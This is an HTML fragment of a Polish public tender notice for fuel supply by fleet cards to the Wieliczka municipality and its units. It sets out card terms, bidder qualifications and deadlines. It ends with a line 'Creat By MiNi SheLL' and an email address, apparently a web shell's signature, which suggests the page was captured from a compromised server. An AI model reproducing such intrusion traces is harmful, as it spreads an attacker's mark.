produktów naftowych i ich usytuowanie (t.j.: Dz.U. z 2014 r., poz. 1853, z późn.zm.) i umożliwiać dokonanie bezgotówkowych transakcji przy pomocy wydanych Zamawiającemu kart flotowych. Wykonawca przez cały okres realizacji umowy utrzymywać będzie wymagany stan sieci stacji paliw. <br/>3.3) bezpośrednio do zbiorników paliwowych pojazdów (w przypadku kart przypisanych do pojazdów), oraz do zbiorników i kanistrów innych niż zamontowane w pojazdach (w przypadku kart na okaziciela),<br/>3.4) sukcesywnie w zależności od potrzeb podmiotów zamawiających,<br/>3.5) na warunkach określonych w ofercie.<br/>4) Warunki dotyczące kart flotowych:<br/>4.1) Wykonawca przed ustalonym terminem rozpoczęcia wykonywania przedmiotu zamówienia, dostarczy podmiotom zamawiającym aktywne karty flotowe (łącznie 84 szt. kart) w rodzaju i ilościach niżej wskazanych dla każdego z podmiotów zamawiających:<br/>a) Gmina Wieliczka – dostawa paliwa na potrzeby pojazdów użytkowanych przez Urząd Miasta i Gminy w Wieliczce oraz jednostek Ochotniczych Straży Pożarnych z terenu gminy Wieliczka:<br/>◦ karty wydane na pojazdy (w tym urządzenia na przyczepach posiadających numery rejestracyjne) : 49 szt.,<br/>◦ karty na okaziciela: 18 szt.,<br/>b) Straż Miejska w Wieliczce:<br/>◦ karty wydane na pojazdy: 2 szt.,<br/>c) Gminny Zarząd Dróg w Wieliczce:<br/>◦ karty wydane na pojazdy: 3 szt.,<br/>◦ karty na okaziciela: 1 szt.,<br/>d) Zarząd Budynków Komunalnych w Wieliczce:<br/>◦ karty wydane na pojazdy: 3 szt.,<br/>◦ karty na okaziciela: 4 szt.,<br/>e) Zarząd Cmentarza Komunalnego w Wieliczce:<br/>◦ karty na okaziciela: 1 szt.,<br/>f) Solne Miasto spółka z ograniczoną odpowiedzialnością:<br/>◦ karty wydane na pojazdy: 2 szt.,<br/>◦ karty na okaziciela: 1 szt. <br/>4.2) Karty zostaną przekazane każdemu z podmiotów zamawiających. Wraz z kartami, w oddzielnych zamkniętych kopertach, zostaną przekazane podmiotom zamawiających zamawiającym kody identyfikacyjne PIN do kart.<br/>4.3) karty będą służyć do zakupu paliw objętych przedmiotem zamówienia,<br/>4.4) zamawiający nie będzie ponosił żadnych kosztów związanych z wydaniem i obsługą kart w okresie realizacji, w tym także z uwagi na konieczność wydania dodatkowych kart z uwagi na zmianę ilości pojazdów u danego Zamawiającego. <br/>4.5) W przypadku konieczności wydania duplikatu karty z przyczyn leżących po stronie Zamawiającego (np. z uwagi na zagubienie lub zniszczenie karty) Zamawiający poniesie koszt wydania duplikatu karty, wynikający z regulaminu obsługi kart obowiązującego u Wykonawcy. <br/>4.6) Najpóźniej z dniem zawarcia umowy Zamawiający przekaże Wykonawcy wykaz pojazdów z wyszczególnieniem ich numerów rejestracyjnych (dot. podmiotów zamawiających użytkujących pojazdy drogowe).<br/>4.7) W sytuacji źle funkcjonującej z winy Wykonawcy karty Zamawiający uprawniony jest do otrzymania nowej karty bez ponoszenia z tego tytułu dodatkowych opłat. <br/>4.8) karty będą zabezpieczone kodem identyfikacyjnym PIN,<br/>4.9) karty wydane na pojazdy będą oznaczone numerem rejestracyjnym pojazdu którego dotyczą,<br/>4.10) karty wydane na okaziciela będą oznaczone nazwą podmiotu zamawiającego oraz indywidualnym numerem identyfikacyjnym dla danej karty,<br/>4.11) wykonawca odmówi przyjęcia zapłaty kartą flotową wydaną na numer rejestracyjny pojazdu w przypadku użycia jej do zatankowania innego pojazdu, niż ten którego numer rejestracyjny znajduje się na karcie lub w przypadku pobrania paliwa do zbiornika typu kanister lub innego, który nie jest bakiem paliwa przytwierdzonym na stałe do pojazdu,<br/>4.12) w razie utraty, zniszczenia, kradzieży karty paliwowej zamawiający zobowiązuje się do natychmiastowego powiadomienia wykonawcy w celu jej zablokowania; zgłoszenia winny być przyjmowane całodobowo we wszystkie dni tygodnia pod wskazany przez wykonawcę numer telefonu,<br/>4.13) wykonawca przejmuje odpowiedzialność za transakcje bezgotówkowe zrealizowane przy użyciu utraconej lub skradzionej karty od momentu otrzymania telefonicznego zgłoszenia,<br/>4.14) termin ważności kart co najmniej przez cały okres obowiązywania umowy. <br/>5) Wykonawca zapewni potwierdzenie transakcji zakupu paliwa przy użyciu kart flotowych w formie wydruku (dowodu sprzedaży) bezpośrednio u operatorów prowadzących stacje paliw. <br/>6) Sprzedaż paliw przy użyciu kart paliwowych odbywać się będzie po cenach detalicznych brutto obowiązujących na danej stacji paliw wykonawcy w momencie realizacji transakcji, przy uwzględnieniu stałego upustu w wysokości określonej w złożonej ofercie na paliwa (od ceny brutto). Upust w tej wysokości naliczany będzie na każdej fakturze VAT wystawionej za okres rozliczeniowy.<br/>7) Wykonawca zobowiązuje udostępniać na żądanie zamawiającego świadectwa jakości paliw płynnych. <br/>8) W przypadku stosowania przez Wykonawców regulaminów określających warunki sprzedaży i użytkowania kart flotowych regulaminy te mogą stanowić integralną część zawartej umowy z Wykonawcą, przy czym w takim wypadku projektowane postanowienia umowy stanowiące załącznik nr 4 do SWZ będą miały charakter nadrzędny nad w/w regulaminem.<br/>9) Wykonawca najpóźniej z dniem zawarcia umowy przekaże Zamawiającemu listę stacji paliw na których możliwe będzie tankowanie pojazdów przy użyciu kart paliwowych lub wskaże stosowną stronę internetową zawierającą aktualną listę tych stacji.<br/>10) Zamawiający wymaga, aby paliwa napędowe których dostawa jest przedmiotem zamówienia, spełniały wymagania określone w Rozporządzeniu Ministra Klimatu i Środowiska z dnia 26 czerwca 2024 r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. z 2024 poz. 1018 ze zm.) oraz posiadały zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzające, że poprzez odpowiednie odniesienie dokładnie oznaczone produkty będące przedmiotem zakupu odpowiadają normom nr:<br/>- dla oleju napędowego PN-EN 590:2022-08;<br/>- dla benzyny bezołowiowej PN-EN 228+A1:2017-06. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09100000-0 - Paliwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09134100-8 - Olej napędowy</p> <p class="mb-0">09132100-4 - Benzyna bezołowiowa</p> <p class="mb-0">30163100-0 - Karty na zakup paliwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-04-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które odpowiadają wymaganiom opisanym w SWZ, t.j. oferty które nie podlegają odrzuceniu. <br/>W związku z faktem, że cechy jakościowe paliw określone są w Rozporządzeniu Ministra Klimatu i Środowiska z dnia 26 czerwca 2024 r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. z 2024 poz. 1018 ze zm.), niniejsze zamówienie spełnia warunki określone w art. 246 ust. 2 uPzp i zamawiający przyjmuje kryterium ceny jako jedyne kryterium oceny ofert w przedmiotowym postępowaniu. Najkorzystniejszą ofertą będzie oferta złożona z najniższą ceną niepodlegająca odrzuceniu.<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 100</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają określone przez zamawiającego warunki udziału w postępowaniu:<br/>1. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają aktualną koncesję na wykonywanie działalności gospodarczej w zakresie objętym zamówieniem publicznym. Wykonawca zobowiązany jest posiadać aktualną koncesję na obrót paliwami ciekłymi (olejem napędowym i benzyną) wydaną przez Prezesa Urzędu Regulacji Energetyki.<br/>2. zdolności technicznej lub zawodowej:<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w celu realizacji zamówienia dysponują odpowiednim potencjałem technicznym w celu realizacji zamówienia, w postaci co najmniej 120 (stu dwudziestu) stacji paliw na terenie kraju (RP), w tym:<br/>- co najmniej 12 stacji paliw musi znajdować się na terenie województwa małopolskiego, z czego co najmniej jedna stacja musi znajdować się na terenie Miasta Wieliczka, bądź w odległości maksymalnie do 5 km w linii prostej (mierzonej za pomocą funkcji „zmierz odległość” w google maps) od siedziby Zamawiającego (Wieliczka, ul Powstania Warszawskiego 1) do stacji paliw,<br/>- co najmniej po 4 stacje paliw na terenie każdego z pozostałych województw.<br/>Wszystkie stacje paliw płynnych muszą spełniać wymogi przewidziane w Rozporządzeniu Ministra Klimatu i Środowiska z dnia 24 lipca 2023 r. w sprawie warunków technicznych, jakim powinny odpowiadać bazy i stacje paliw płynnych, bazy i stacje gazu płynnego, rurociągi przesyłowe dalekosiężne służące do transportu ropy naftowej i produktów naftowych i ich usytuowanie (Dz.U. z 2023 r. poz. 1707) i umożliwiać dokonanie transakcji bezgotówkowo, za pomocą wydanych Zamawiającemu kart flotowych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 594 ze zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Oświadczenie należy sporządzić na formularzu stanowiącym Załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Aktualna koncesja na obrót paliwami ciekłymi wydaną przez Prezesa Urzędu Regulacji Energetyki.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym – sporządzonym według wzoru stanowiącym Załącznik nr 1 do SWZ i opatrzony stosownym podpisem, <br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) Oświadczenie, o którym mowa w art. 125 ust. 1 uPzp, t.j oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – sporządzone zgodnie z Załącznikiem nr 2 do SWZ i opatrzone stosownym podpisem. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>a) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. W/w dotyczy również odpowiednio wspólników spółki cywilnej, którzy traktowani będą jak wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego.<br/>b) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem o którym mowa w art. 125 ust. 1 uPzp, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby. Oświadczenie należy sporządzić zgodnie z Załącznikiem nr 2a do SWZ oraz opatrzyć stosownym podpisem. <br/>2) dokumenty, z których wynika prawo do podpisania oferty (np. odpis z KRS, odpis CEiIoDG, odpowiednie pełnomocnictwa), o których mowa w pkt 30 SWZ.<br/>3) Zobowiązanie innego podmiotu do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy (jeżeli dotyczy), o których mowa w pkt 16.2.2) SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia i w takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu, albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy załączyć do oferty dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia.<br/>4. Pełnomocnictwo musi przyjąć taką samą formę jak składana oferta (art. 99 § 1 KC).<br/>5. Oświadczenie o którym mowa w art. 125 ust. 1 uPZP składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>6. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>6.1. Odnośnie warunku dotyczącego uprawnień, każdy z Wykonawców wykonujących czynności w zakresie dostawy oleju napędowego i benzyny bezołowiowej posiadał aktualną koncesję, zezwolenie lub licencję na wykonywanie działalności gospodarczej w zakresie objętym zamówieniem publicznym, t.j. koncesję na obrót paliwami ciekłymi. <br/>6.2. Odnośnie warunku dotyczącego zdolności technicznej lub zawodowej, dopuszcza się wykazanie spełniania warunku udziału w postępowaniu łącznie przez Wykonawców.<br/>7. W przypadku wspólnego ubiegania się o udzielenie zamówienia każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest do złożenia Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Do zmianumowy zastosowanie mają przepisy art. 454-455 ustawy Prawo zamówień publicznych. Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych w następujących przypadkach:<br/>1) zmian nazwy, siedziby lub innych danych Wykonawcy,<br/>2) udziału lub zmiany podwykonawców,<br/>3) zmianę terminu wykonywania umowy wynikającą z przedłużających się procedur administracyjnych (np. związanych z zamówieniami publicznymi, pozyskiwaniem dodatkowych uzgodnień lub decyzji),<br/>4) wszelkich zmian wynikających z konieczności dostosowania warunków już zawartej umowy do nowych uregulowań prawnych,<br/>5) Zmiany wartości umowy w przypadku zmiany stawki podatku VAT w trakcie realizacji przedmiotu zamówienia zgodnie z postanowieniami §7 ust. 13 umowy,<br/>6) Zmiany liczby pojazdów o których mowa w załączniku nr 1 do umowy i związanym obowiązkiem dostarczenia dodatkowych kart na te pojazdy. <br/>2. Określa się następujący tryb dokonywania zmian postanowień umowy. Sposób inicjowania zmian:<br/>1) Wykonawca wnioskuje do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany,<br/>2) Zamawiający wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany.<br/>3) Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach takich jak notatka służbowa, pismo Wykonawcy, protokół konieczności itp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1059200</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-18 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com